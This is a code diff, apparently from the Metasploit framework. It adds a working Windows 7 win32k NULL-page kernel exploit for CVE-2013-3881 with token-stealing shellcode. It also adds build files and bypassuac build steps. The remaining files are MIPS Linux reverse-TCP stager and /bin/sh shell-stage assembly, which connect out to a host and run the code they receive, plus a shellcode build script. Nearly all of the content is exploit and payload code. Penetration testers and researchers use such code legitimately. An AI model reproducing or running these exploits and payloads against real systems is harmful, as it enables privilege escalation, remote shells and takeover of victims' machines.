+		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,261 @@
+/*
+ * Exploit Title: CVE-2013-3881 Win32k NULL Page Vulnerability
+ * Date: February 5, 2014
+ * Vulnerability Discovery: Seth Gibson and Dan Zentner of Endgame
+ * Exploit Author: Spencer McIntyre
+ * Version: Windows 7 SP0/SP1
+ * Tested on: Windows 7 SP0/SP1
+ * CVE-2013-3881 MS13-081
+ * References:
+ *   http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html
+ *   http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html
+ *   http://picturoku.blogspot.com/2011/12/bit-away-from-kernel-execution.html
+ */
+
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
+// Purloined from ntstatus.h
+#define STATUS_SUCCESS                          ((NTSTATUS)0x00000000L) // ntsubauth
+
+#define WIN32_NO_STATUS
+#include <windows.h>
+#undef WIN32_NO_STATUS
+
+#ifndef _NTDEF_
+typedef __success(return >= 0) LONG NTSTATUS;
+typedef NTSTATUS *PNTSTATUS;
+#endif
+
+#define TABLE_BASE 0xff910000
+
+static const char* window_class_name = "PWN_CLASS";
+static HWND window0 = NULL;
+static HWND window1 = NULL;
+static HDESK desktop = NULL;
+
+const unsigned char shellcode[] =
+	"\x33\xc0"                      // xor eax, eax
+	"\x64\x8b\x80\x24\x01\x00\x00"  // mov eax, fs:[eax+0x124]
+	"\x8b\x40\x50"                  // mov eax, ds:[eax+0x50]
+	"\x8b\xc8"                      // mov ecx, eax
+	/* LOOPTHROUGHPROCESSES */
+	"\x8b\x80\xb8\x00\x00\x00"      // mov eax, ds:[eax+0xb8]
+	"\x2d\xb8\x00\x00\x00"          // sub eax, 0xb8
+	"\x83\xb8\xb4\x00\x00\x00\x04"  // cmp DWORD PTR ds:[eax+0xb4], 4
+	"\x75\xec"                      // jnz short LOOPTHROUGHPROCESSES
+	"\x8b\x90\xf8\x00\x00\x00"      // mov edx, ds:[eax+0x0f8]
+	"\x89\x91\xf8\x00\x00\x00"      // mov [ecx+0x0f8], edx
+	/* Epilog Part 1: Uncorrupt HANDLEENTRY */
+	"\xbe\x00\x08\x00\x00"          // mov esi, 0x0800
+	"\x8b\x3e"                      // mov edi, [esi]
+	"\x8b\x46\x04"                  // mov eax, [esi+4]
+	"\x89\x07"                      // mov [edi], eax
+	"\x8b\x46\x08"                  // mov eax, [esi+8]
+	"\x89\x47\x04"                  // mov [edi + 4], eax
+	"\x8b\x46\x0c"                  // mov eax, [esi+c]
+	"\x89\x47\x08"                  // mov [edi+8], eax
+	/* Epilog Part 2: Return to xxxTrackPopupMenuEx */
+	"\x83\x7c\x24\x58\x00"          // cmp DWORD PTR [esp+0x58], 0
+	"\x74\x11"                      // je short sp1
+	"\x83\x7c\x24\x5c\x01"          // cmp DWORD PTR [esp+0x5c], 1
+	"\x75\x0a"                      // je short sp1
+	/* Service Pack 0 */
+	"\x83\xc4\x48"                  // add esp, 0x48
+	"\x5f"                          // pop edi
+	"\x5e"                          // pop esi
+	"\x5b"                          // pop ebx
+	"\x5d"                          // pop ebp
+	"\xc2\x04\x00"                  // ret 4
+	/* Service Pack 1 */
+	"\x83\xc4\x4c"                  // add esp 0x4c
+	"\x5f"                          // pop edi
+	"\x5e"                          // pop esi
+	"\x83\xc4\x0c"                  // add esp, 0x0c
+	"\x5d"                          // pop ebp
+	"\xc2\x08\x00";                 // ret 8
+
+typedef struct _HANDLEENTRY {
+	struct _HEAD *pHead;
+	void         *pOwner;
+	UINT8        bType;
+	UINT8        bFlags;
+	UINT16       wUniq;
+} HANDLEENTRY, *PHANDLEENTRY;
+
+typedef NTSTATUS (NTAPI *lNtAllocateVirtualMemory)(
+	IN  HANDLE  ProcessHandle,
+	IN  PVOID   *BaseAddress,
+	IN  PULONG  ZeroBits,
+	IN  PSIZE_T RegionSize,
+	IN  ULONG   AllocationType,
+	IN  ULONG   Protect
+);
+
+typedef NTSTATUS (NTAPI *lNtQueryIntervalProfile)(
+	IN  DWORD  ProfileSource,
+	OUT PULONG Interval
+);
+
+LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
+	return DefWindowProc(hwnd, msg, wParam, lParam);
+}
+
+NTSTATUS AllocateNullPage(void) {
+	HMODULE hNtdll = NULL;
+	FARPROC pNtAllocateVirtualMemory = NULL;
+	DWORD base_address = 1;
+	SIZE_T region_size = 0x1000;
+	ULONG zero_bits = 0;
+	HANDLE current_process = NULL;
+	NTSTATUS status = 0;
+
+	hNtdll = LoadLibraryA("ntdll");
+	pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
+	current_process = GetCurrentProcess();
+	status = pNtAllocateVirtualMemory(current_process, &base_address, 0, &region_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE);
+	FreeLibrary(hNtdll);
+	return status;
+}
+
+PHANDLEENTRY GetAheList(void) {
+	HMODULE hUser32 = NULL;
+	HANDLEENTRY **tagSharedInfo = NULL;
+
+	hUser32 = LoadLibraryA("user32");
+	tagSharedInfo = (PHANDLEENTRY *)GetProcAddress(hUser32, "gSharedInfo");
+	if (tagSharedInfo == NULL) {
+		return NULL;
+	}
+	return (PHANDLEENTRY)*&tagSharedInfo[1];
+}
+
+DWORD WINAPI TriggerThread0(void *garbage) {
+	HMENU menu0;
+
+	SetThreadDesktop(desktop);
+	window0 = CreateWindow(window_class_name, "Window 0", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
+	menu0 = CreatePopupMenu();
+	if (AppendMenu(menu0, (MF_STRING | MF_ENABLED), 32001, "test") == 0) {
+		return 0;
+	}
+	TrackPopupMenu(menu0, TPM_CENTERALIGN, 0, 0, 0, window0, NULL);
+	return 0;
+}
+
+BOOL WINAPI CreateAndRegisterClass(char * class_name) {
+	WNDCLASSEX wx;
+	HINSTANCE hInstance = NULL;
+
+	hInstance = (HINSTANCE)GetModuleHandle(NULL);
+	if (hInstance == NULL) {
+		return FALSE;
+	}
+
+	wx.cbSize = sizeof(WNDCLASSEX);
+	wx.style = 0;
+	wx.lpfnWndProc = WndProc;
+	wx.cbClsExtra = 0;
+	wx.cbWndExtra = 0;
+	wx.hInstance = hInstance;
+	wx.hIcon = LoadIcon(NULL, IDI_APPLICATION);
+	wx.hCursor = LoadCursor(NULL, IDC_ARROW);
+	wx.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
+	wx.lpszMenuName = NULL;
+	wx.lpszClassName = class_name;
+	wx.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
+
+	if (RegisterClassEx(&wx) != 0) {
+		return TRUE;
+	}
+	return FALSE;
+}
+
+DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
+	VOID(*lpCode)() = (VOID(*)())lpPayload;
+	lpCode();
+	return ERROR_SUCCESS;
+}
+
+void Win32kNullPage(LPVOID lpPayload) {
+	HMENU menu1 = NULL;
+	HMENU menu2 = NULL;
+	HANDLE gdi_handle = NULL;
+	void *promise_land = NULL;
+	ULONG interval = 0;
+	PHANDLEENTRY aheList = NULL;
+	PHANDLEENTRY target_handle = NULL;
+	DWORD saved_bytes = 0;
+
+	desktop = CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL);
+	SetThreadDesktop(desktop);
+
+	if (!CreateAndRegisterClass(window_class_name)) {
+		return;
+	}
+
+	if (AllocateNullPage() != STATUS_SUCCESS) {
+		return;
+	}
+	*((PDWORD)promise_land + 0)  = 0x000004eb; /* jmp 4 */
+	*((PDWORD)promise_land + 1)  = 0x90909090; /* noooop */
+	*((PDWORD)promise_land + 2)  = 0x000400b8; /* mov eax, 400 */
+	*((PDWORD)promise_land + 3)  = 0x90d0ff00; /* call eax */
+	*((PDWORD)promise_land + 7)  = 0x00;
+	*((PDWORD)promise_land + 9)  = 0x00;
+	*((PDWORD)promise_land + 12) = 0x00;
+	*(PDWORD)((PBYTE)promise_land + 0x04eb + 0x04) = (0x0200 - 4);
+	*(PDWORD)((PBYTE)promise_land + 0x04eb + 0x08) = (0x0200 - 4);
+	memcpy((PDWORD)promise_land + 256, shellcode, sizeof(shellcode));
+
+	window1 = CreateWindow(window_class_name, "Window 1", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
+	menu1 = CreatePopupMenu();
+	menu2 = CreateMenu();
+	SetMenu(window1, menu2);
+	DestroyMenu(menu2);
+
+	aheList = GetAheList();
+	*((PDWORD)promise_land + 127) = ((DWORD)menu2 & 0xffff);
+	*((PDWORD)promise_land + 128) = 0x01;
+	*((PDWORD)promise_land + 129) = ((((DWORD)menu2 & 0xffff) * 12) + TABLE_BASE + 5) - 0x0104;
+
+	target_handle = &aheList[((DWORD)menu2 & 0xffff)];
+	*((PDWORD)promise_land + 512) = ((((DWORD)menu2 & 0xffff) * 12) + TABLE_BASE);
+	memcpy((PDWORD)promise_land + 513, target_handle, sizeof(HANDLEENTRY));
+
+	if (AppendMenu(menu1, (MF_STRING | MF_ENABLED), 32001, "test") == 0) {
+		return;
+	}
+
+	do {
+		gdi_handle = CreateMetaFile(NULL);
+	} while (gdi_handle != NULL);
+
+	CreateThread(NULL, 0, TriggerThread0, NULL, 0, 0);
+	Sleep(500);
+	TrackPopupMenu(menu1, TPM_CENTERALIGN, 0, 0, 0, window1, NULL);
+	CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
+	return;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
+	BOOL bReturnValue = TRUE;
+	switch (dwReason) {
+		case DLL_QUERY_HMODULE:
+			hAppInstance = hinstDLL;
+			if (lpReserved != NULL) {
+				*(HMODULE *)lpReserved = hAppInstance;
+			}
+			break;
+		case DLL_PROCESS_ATTACH:
+			hAppInstance = hinstDLL;
+			Win32kNullPage(lpReserved);
+			break;
+		case DLL_PROCESS_DETACH:
+		case DLL_THREAD_ATTACH:
+		case DLL_THREAD_DETACH:
+			break;
+	}
+	return bReturnValue;
+};
@@ -0,0 +1,85 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
+    <RootNamespace>cve20133881</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <CompileAs>CompileAsC</CompileAs>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <OptimizeReferences>true</OptimizeReferences>
+      <OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <CompileAs>CompileAsC</CompileAs>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <CompileAs>Default</CompileAs>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <OptimizeReferences>true</OptimizeReferences>
+      <OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2013-3881.c" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,17 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\cve-2013-3881.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86" />
+
+  <Target Name="x86">
+    <Message Text="Building CVE-2013-3881 win32k_null_page x86 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="CVE-2013-3881 is not supported in x64" />
+  </Target>
+</Project>
@@ -40,6 +40,27 @@ IF "%ERRORLEVEL%"=="0" (
  POPD
 )

+IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building CVE-2013-3881 (win32k_null_page)"
+  PUSHD CVE-2013-3881
+  msbuild.exe make.msbuild /target:%PLAT%
+  POPD
+)
+
+IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building bypassuac (on-disk)"
+  PUSHD bypassuac
+  msbuild.exe make.msbuild /target:%PLAT%
+  POPD
+)
+
+IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building bypassuac (in-memory)"
+  PUSHD bypassuac_injection
+  msbuild.exe make.msbuild /target:%PLAT%
+  POPD
+)
+
 FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
 SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
 echo Finished %ldt%
@@ -0,0 +1,75 @@
+##
+#
+#        Name: stage_tcp_shell
+#        Type: Stage
+#   Qualities: Compatible with both mips little and big endian
+#   Platforms: Linux
+#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>
+#     License: 
+#
+#        This file is part of the Metasploit Exploit Framework
+#        and is subject to the same licenses and copyrights as
+#        the rest of this package.
+#
+# Description:
+#
+#        This payload duplicates stdio, stdin and stderr to a file descriptor,
+#        stored on $s2, and executes /bin/sh.
+#
+#        Assemble and create a relocatable object with:
+#          as -o stage_tcp_shell.o stage_tcp_shell.s
+#
+#        Assemble, link and create an executable ELF with:
+#          gcc -o stage_tcp_shell stage_tcp_shell.s
+#
+#        The tool "tools/metasm_shell.rb" can be used to easily
+#        generate the string to place on:
+#          modules/payloads/stages/linux/mipsle/shell.rb
+#        and:
+#          modules/payloads/stages/linux/mipsbe/shell.rb
+##
+	.text
+	.align  2
+	.globl  main
+	.set    nomips16
+main:
+	.set    noreorder
+	.set    nomacro
+
+	# dup2(sockfd, 2)
+	# dup2(sockfd, 1)
+	# dup2(sockfd, 0)
+ 	# a0: oldfd (sockfd)
+ 	# a1: newfd (2, 1, 0)
+ 	# v0: syscall = __NR_dup2 (4063)
+	li      $s1, -3
+	nor     $s1, $s1, $zero
+	add     $a0, $s2, $zero
+dup2_loop:
+	add     $a1, $s1, $zero # dup2_loop
+	li      $v0, 4063       # sys_dup2
+	syscall 0x40404
+	li      $s0, -1
+	addi    $s1, $s1, -1
+	bne     $s1, $s0, dup2_loop # <dup2_loop>
+
+	# execve("/bin/sh", ["/bin/sh"], NULL)
+	# a0: filename "/bin/sh"
+	# a1: argv ["/bin/sh", NULL]
+	# a2: envp NULL
+	# v0: syscall = __NR_dup2 (4011)
+	li      $t8, -1         # load t8 with -1
+getaddr:                    # getaddr trick from scut@team-teso.net
+	bltzal  $t8, getaddr    # branch with $ra stored if t8 < 0
+	slti    $t8, $zero, -1  # delay slot instr: $t8 = 0 (see below)
+	addi    $a0, $ra, 28    # $ra gets this address
+	sw      $a0, -8($sp)
+	sw      $zero, -4($sp)
+	addi    $a1, $sp, -8
+	slti    $a2, $zero,-1
+	li      $v0, 4011       # sys_execve
+	syscall 0x40404
+
+	.string "/bin/sh"
+	.set    macro
+	.set    reorder
@@ -0,0 +1,127 @@
+##
+# 
+#        Name: stager_sock_reverse
+#        Type: Stager
+#   Qualities: No Nulls out of the IP / Port data
+#   Platforms: Linux MIPS Big Endian
+#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>
+#     License: 
+#
+#        This file is part of the Metasploit Exploit Framework
+#        and is subject to the same licenses and copyrights as
+#        the rest of this package.
+#
+# Description:
+#
+#        Implementation of a MIPS BE Linux reverse TCP stager.
+#
+#        File descriptor in $s2.
+#
+#        Assemble and create a relocatable object with:
+#          as -o stager_sock_reverse.o stager_sock_reverse.s
+#
+#        Assemble, link and create an executable ELF with:
+#          gcc -o stager_sock_reverse stager_sock_reverse.s
+#
+#        The tool "tools/metasm_shell.rb" can be used to easily
+#        generate the string to place on:
+#          modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
+##
+	.text
+	.align  2
+	.globl  main
+	.set    nomips16
+main:
+	.set    noreorder
+	.set    nomacro
+
+	# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+	# a0: domain = PF_INET (2)
+	# a1: type = SOCK_STREAM (2)
+	# a2: protocol = IPPROTO_IP (0)
+	# v0: syscall = __NR_socket (4183)
+	li      $t7, -6
+	nor     $t7, $t7, $zero
+	addi    $a0, $t7, -3
+	addi    $a1, $t7, -3
+	slti    $a2, $zero, -1
+	li      $v0, 4183
+	syscall 0x40404
+	sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
+	
+	# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
+	# a0: sockfd
+	# a1: addr = AF_INET (2)
+	# a2: addrlen = 16
+	# v0: syscall = __NR_connect (4170)
+	lw      $a0, -4($sp)
+	li      $t7, -3
+	nor     $t7, $t7, $zero
+	sw      $t7, -32($sp)
+	lui     $t6, 0x115c
+	sw      $t6, -28($sp)
+	lui     $t6, 0x7f00          # ip
+	ori     $t6, $t6, 0x0001     # ip
+	sw      $t6, -26($sp)
+	addiu   $a1, $sp, -30
+	li      $t4, -17
+	nor     $a2, $t4, $zero
+	li      $v0, 4170
+	syscall 0x40404
+	
+	# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
+	# a0: addr = -1
+	# a1: lenght = 4096
+	# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
+	# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
+	# sp(16): fd = -1
+	# sp(20): offset = 0
+	# v0: syscall = __NR_mmap (4090)
+	li      $a0, -1
+	li      $a1, 4097
+	addi    $a1, $a1, -1
+	li      $t1, -8
+	nor     $t1, $t1, $0
+	add     $a2, $t1, $0
+	li      $a3, 2050
+	li      $t3, -22
+	nor     $t3, $t3, $zero
+	add     $t3, $sp, $t3
+	sw      $0, -1($t3)         # Doesn't use $sp directly to avoid nulls
+	sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
+	li      $v0, 4090
+	syscall 0x40404
+	sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack
+
+	# read(sockfd, addr, 4096)
+	# a0: sockfd
+	# a1: addr
+	# a2: len = 4096
+	# v0: syscall = __NR_read (4003)
+	lw      $a0, -4($sp)
+	lw      $a1, -8($sp)
+	li      $a2, 4097
+	addi    $a2, $a2, -1
+	li      $v0, 4003
+	syscall 0x40404
+
+	# cacheflush(addr, nbytes, DCACHE)
+	# a0: addr
+	# a1: nbytes
+	# a2: cache = DCACHE (2)
+	# v0: syscall = __NR_read (4147)
+	lw      $a0, -8($sp)
+	add     $a1, $v0, $zero
+	li      $t1, -3
+	nor     $t1, $t1, $0
+	add     $a2, $t1, $0
+	li      $v0, 4147
+	syscall 0x40404
+	
+	# jmp to the stage
+	lw      $s1, -8($sp)
+	lw      $s2, -4($sp)
+	jalr    $s1
+
+	.set    macro
+	.set    reorder
@@ -0,0 +1,127 @@
+##
+# 
+#        Name: stager_sock_reverse
+#        Type: Stager
+#   Qualities: No Nulls out of the IP / Port data
+#   Platforms: Linux MIPS Little Endian
+#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>
+#     License: 
+#
+#        This file is part of the Metasploit Exploit Framework
+#        and is subject to the same licenses and copyrights as
+#        the rest of this package.
+#
+# Description:
+#
+#        Implementation of a MIPS LE Linux reverse TCP stager.
+#
+#        File descriptor in $s2.
+#
+#        Assemble and create a relocatable object with:
+#          as -o stager_sock_reverse.o stager_sock_reverse.s
+#
+#        Assemble, link and create an executable ELF with:
+#          gcc -o stager_sock_reverse stager_sock_reverse.s
+#
+#        The tool "tools/metasm_shell.rb" can be used to easily
+#        generate the string to place on:
+#          modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
+##
+	.text
+	.align  2
+	.globl  main
+	.set    nomips16
+main:
+	.set    noreorder
+	.set    nomacro
+
+	# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+	# a0: domain = PF_INET (2)
+	# a1: type = SOCK_STREAM (2)
+	# a2: protocol = IPPROTO_IP (0)
+	# v0: syscall = __NR_socket (4183)
+	li      $t7, -6
+	nor     $t7, $t7, $zero
+	addi    $a0, $t7, -3
+	addi    $a1, $t7, -3
+	slti    $a2, $zero, -1
+	li      $v0, 4183
+	syscall 0x40404
+	sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
+	
+	# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
+	# a0: sockfd
+	# a1: addr = AF_INET (2)
+	# a2: addrlen = 16
+	# v0: syscall = __NR_connect (4170)
+	lw      $a0, -4($sp)
+	li      $t7, -3
+	nor     $t7, $t7, $zero
+	sw      $t7, -30($sp)
+	ori     $t6, $zero, 0x5c11  # port
+	sw      $t6, -28($sp)
+	lui     $t6, 0x100          # ip
+	ori     $t6, $t6, 0x7f      # ip
+	sw      $t6, -26($sp)
+	addiu   $a1, $sp, -30
+	li      $t4, -17
+	nor     $a2, $t4, $zero
+	li      $v0, 4170
+	syscall 0x40404
+	
+	# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
+	# a0: addr = -1
+	# a1: lenght = 4096
+	# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
+	# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
+	# sp(16): fd = -1
+	# sp(20): offset = 0
+	# v0: syscall = __NR_mmap (4090)
+	li      $a0, -1
+	li      $a1, 4097
+	addi    $a1, $a1, -1
+	li      $t1, -8
+	nor     $t1, $t1, $0
+	add     $a2, $t1, $0
+	li      $a3, 2050
+	li      $t3, -22
+	nor     $t3, $t3, $zero
+	add     $t3, $sp, $t3
+	sw      $0, -1($t3)         # Doesn't use $sp directly to avoid nulls
+	sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
+	li      $v0, 4090
+	syscall 0x40404
+	sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack
+
+	# read(sockfd, addr, 4096)
+	# a0: sockfd
+	# a1: addr
+	# a2: len = 4096
+	# v0: syscall = __NR_read (4003)
+	lw      $a0, -4($sp)
+	lw      $a1, -8($sp)
+	li      $a2, 4097
+	addi    $a2, $a2, -1
+	li      $v0, 4003
+	syscall 0x40404
+
+	# cacheflush(addr, nbytes, DCACHE)
+	# a0: addr
+	# a1: nbytes
+	# a2: cache = DCACHE (2)
+	# v0: syscall = __NR_read (4147)
+	lw      $a0, -8($sp)
+	add     $a1, $v0, $zero
+	li      $t1, -3
+	nor     $t1, $t1, $0
+	add     $a2, $t1, $0
+	li      $v0, 4147
+	syscall 0x40404
+	
+	# jmp to the stage
+	lw      $s1, -8($sp)
+	lw      $s2, -4($sp)        # sockfd saved on $s2
+	jalr    $s1
+
+	.set    macro
+	.set    reorder
@@ -1,6 +1,6 @@
 ;      Title:  Windows Bind Stager (NX, IPv6)
 ;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
-;     Author:  Rapid7 LLC
+;     Author:  Rapid7, Inc

 [BITS 32]

@@ -1,6 +1,6 @@
 ;      Title:  Windows Reverse Connect Stager (NX, IPv6)
 ;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista
-;     Author:  Rapid7 LLC
+;     Author:  Rapid7, Inc

 [BITS 32]

@@ -1,124 +1,128 @@
-#=============================================================================#
-# A simple python build script to build the singles/stages/stagers and
-# some usefull information such as offsets and a hex dump. The binary output
-# will be placed in the bin directory. A hex string and usefull comments will
-# be printed to screen.
-#
-# Example:
-#     >python build.py stager_reverse_tcp_nx
-#
-# Example, to build everything:
-#     >python build.py all > build_output.txt
-#
-# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-#=============================================================================#
-import os, sys, time
-from subprocess import Popen
-from struct import pack
-#=============================================================================#
-def clean( dir="./bin/" ):
-  for root, dirs, files in os.walk( dir ):
-    for name in files:
-      os.remove( os.path.join( root, name ) )
-#=============================================================================#
-def locate( src_file, dir="./src/" ):
-  for root, dirs, files in os.walk( dir ):
-    for name in files:
-      if src_file == name:
-        return root
-  return None
-#=============================================================================#
-def build( name ):
-  location = locate( "%s.asm" % name )
-  if location:
-    input = os.path.normpath( os.path.join( location, name ) )
-    output = os.path.normpath( os.path.join( "./bin/", name ) )
-    p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
-    p.wait()
-    xmit( name )
-  else:
-    print "[-] Unable to locate '%s.asm' in the src directory" % name
-#=============================================================================#
-def xmit_dump_ruby( data, length=16 ):
-  dump = ""
-  for i in xrange( 0, len( data ), length ):
-    bytes = data[ i : i+length ]
-    hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
-    if i+length <= len(data):
-      hex += " +"
-    dump += "%s\n" % ( hex )
-  print dump
-#=============================================================================#
-def xmit_offset( data, name, value ):
-  offset = data.find( value );
-  if offset != -1:
-    print "# %s Offset: %d" % ( name, offset )
-#=============================================================================#
-def xmit( name, dump_ruby=True ):
-  bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
-  f = open( bin, 'rb')
-  data = f.read()
-  print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
-  xmit_offset( data, "Port", pack( ">H", 4444 ) )           # 4444
-  xmit_offset( data, "LEPort", pack( "<H", 4444 ) )         # 4444
-  xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) )     # 127.0.0.1
-  xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
